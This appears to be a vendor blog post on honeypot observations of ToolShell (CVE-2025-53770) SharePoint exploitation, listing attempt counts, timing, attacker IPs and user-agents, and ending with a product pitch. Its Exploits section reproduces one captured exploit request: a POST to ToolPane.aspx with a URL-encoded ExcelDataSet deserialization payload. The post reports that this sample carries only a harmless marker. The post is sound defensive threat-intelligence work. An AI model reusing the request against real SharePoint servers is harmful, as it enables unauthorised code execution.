#N‑Day SharePoint Exploit Intelligence with Honeypots

TL;DR

• Within an hour of the July 20 advisory, we spun up 20 SharePoint-flavored honeypots across multiple regions.

• Detected 91 attempts of exploiting Toolshell in the first 48 hours; over 50% were marked “clean” on VT at time of observation.

• Observed attack chains consistent with public reporting, using the spoofing/auth-bypass vuln followed by the RCE/deserialization half.

#Backstory & Objective

On 2025‑07‑20 (EEST), CISA flagged active exploitation of new SharePoint vulnerabilities. We immediately deployed 20 high‑interaction honeypots to:

• Validate exploit prevalence

• See if we could extract indicators before they went public

• Publish data from the experiment on Twitter / X.

#Results

#Interesting Hits (first 48h)

• The first 24 hours contained mostly traffic that looked like vendors scanning for signs of exploitation, i.e. GETting the spinstall0.aspx path.

• However, exploit traffic started hitting the honeypots just before a POC went public.

• Altogether detected 91 attempts of exploiting Toolshell in the first 48 hours.

Over 50% were marked “clean” on VT at time of observation:

View tweet

#Beating the Public POC

Interestingly, the first exploit attempt hit one of the honeypots roughly 30 minutes before a public POC was put onto Github:

View tweet

#Exploits

While there was a good amount of exploits, most contained exploit payloads for testing purposes, e.g.:

POST /_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx HTTP/1.1
.... MSOTlPn_Uri=http%3a%2f%2flocalhost%2f_controltemplates%2f15%2fAclEditor.ascx&MSOTlPn_DWP=%0a%20%20%20%20%3c%25%40%20Register%20Tagprefix%3d%22Scorecard%22%20Namespace%3d%22Microsoft.PerformancePoint.Scorecards%22%20Assembly%3d%22Microsoft.PerformancePoint.Scorecards.Client%2c%20Version%3d16.0.0.0%2c%20Culture%3dneutral%2c%20PublicKeyToken%3d71e9bce111e9429c%22%20%25%3e%0a%20%20%20%20%3c%25%40%20Register%20Tagprefix%3d%22asp%22%20Namespace%3d%22System.Web.UI%22%20Assembly%3d%22System.Web.Extensions%2c%20Version%3d4.0.0.0%2c%20Culture%3dneutral%2c%20PublicKeyToken%3d31bf3856ad364e35%22%20%25%3e%0a%0a%3casp%3aUpdateProgress%20ID%3d%22UpdateProgress1%22%20DisplayAfter%3d%2210%22%20%0arunat%3d%22server%22%20AssociatedUpdatePanelID%3d%22upTest%22%3e%0a%3cProgressTemplate%3e%0a%20%20%3cdiv%20class%3d%22divWaiting%22%3e%20%20%20%20%20%20%20%20%20%20%20%20%0a%20%20%20%20%3cScorecard%3aExcelDataSet%20CompressedDataTable%3d%22%0d%0a%20%20%20%20%3c%25%40%20Register%20Tagprefix%3d%22Scorecard%22%20Namespace%3d%22Microsoft.PerformancePoint.Scorecards%22%20Assembly%3d%22Microsoft.PerformancePoint.Scorecards.Client%2c%20Version%3d16.0.0.0%2c%20Culture%3dneutral%2c%20PublicKeyToken%3d71e9bce111e9429c%22%20%25%3e%0d%0a%20%20%20%20%3c%25%40%20Register%20Tagprefix%3d%22asp%22%20Namespace%3d%22System.Web.UI%22%20Assembly%3d%22System.Web.Extensions%2c%20Version%3d4.0.0.0%2c%20Culture%3dneutral%2c%20PublicKeyToken%3d31bf3856ad364e35%22%20%25%3e%0d%0a%0d%0a%3casp%3aUpdateProgress%20ID%3d%22UpdateProgress1%22%20DisplayAfter%3d%2210%22%20%0d%0arunat%3d%22server%22%20AssociatedUpdatePanelID%3d%22upTest%22%3e%0d%0a%3cProgressTemplate%3e%0d%0a%20%20%3cdiv%20class%3d%22divWaiting%22%3e%20%20%20%20%20%20%20%20%20%20%20%20%0d%0a%20%20%20%20%3cScorecard%3aExcelDataSet%20CompressedDataTable%3d%22H4sICPdrf2gAA21hcmtlci54bWwAhZJda8MgGIXv%2bytEFtgY1rSlFMR4UwYbrGzQsK%2b7t9E0shqD2qU%2ff5Kk61YGFcGb43OO75FLXZZbx%2foDDDqYXe2Z8RICZHjvauaLShnwxOjCWW%2fLQAprWNSRXoVH6Hz1kJ55CXJ0Jl8TLCKKl9aKDsk34NCQT8sM57DZKYx6V%2bZs%2b%2bSkivwUH1UV%2bGUF9Vb5DOvaKxeUxGLIxxtbDMkOXme4CqFhlLZtO25nY%2bu2dJqmE%2fq2elx3YUkkBKgL9eeBR4C8DPhxjt658uHVQdMoJ37h%2bENdWpFX2qO4AVXgzE55j5Yvd2SaTudkPlssUvRsl8iA%2b1RuzGl35zck1ybiwTTi6jrORiGyR7fJO0kMSWSe3LNkxZL1xw2nJ%2bUpGv0nG6dxWEMLNNbQFUO7Zjg9%2bzJi9A0tsNnlRQIAAA%3d%3d%22%20DataTable-CaseSensitive%3d%22false%22%20runat%3d%22server%22%3e%0a%3c%2fScorecard%3aExcelDataSet%3e%0a%20%20%3c%2fdiv%3e%0a%3c%2fProgressTemplate%3e%0a%3c%2fasp%3aUpdateProgress%3e%0a%20%20%20%20

That translated to:

<diffgr:diffgram ...>
  <foo><bar ...>
    <poc>...<Info>This is a harmless CVE-2025-53770 PoC marker.</Info>...</poc>

#Indicators

Observed IPs Targetting the Exploit Path:

• 113.178.19.153
• 138.199.53.248
• 146.70.165.94
• 149.102.239.227
• 180.93.183.110
• 182.2.79.164
• 36.68.9.91
• 45.141.56.114
• 45.191.66.77
• 45.87.213.227
• 83.136.182.237

Unique User-Agents:

• Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.3.17
• Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0
• Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
• Mozilla/5.0 (X11; Linux i686; rv:124.0) Gecko/20100101 Firefox/124.0
• curl/8.1.2
• Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Edg/119.0.0.0
• Mozilla/5.0 (Macintosh; Intel Mac OS X 15_5_7; es) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.7 Safari/605.1.15
• Mozilla/5.0 (Debian; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0
• Mozilla/5.0 (CentOS; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0
• Mozilla/5.0 (Windows NT 10.0; Win64; x64)
• python-requests/2.31.0
• Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
• curl/7.68.0
• Mozilla/5.0 (SS; Linux x86_64; rv:127.0) Gecko/20100101 Firefox/127.0
• Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.5 Safari/605.1.15

Varying Content Lengths:

516, 7699, 397, 1055, 1057, 1442, 1446, 1448, 1452, 2480, 561, 1456, 1468, 4962, 872, 373, 118, 119, 120, 1532

#Limitations

This was an ad-hoc experiment standing up infrastructure rapidly into various public clouds. Results might be much more interesting with a longer-term deployment into less noisy infrastructure.

#Closing

Honeypots gave a time advantage on credible indicators while public lists lagged, and provided payload IOCs before publicly known exploits were available.

Build Your Own Threat Intelligence

Deploy a SharePoint Decoy for Free.

Deploy Now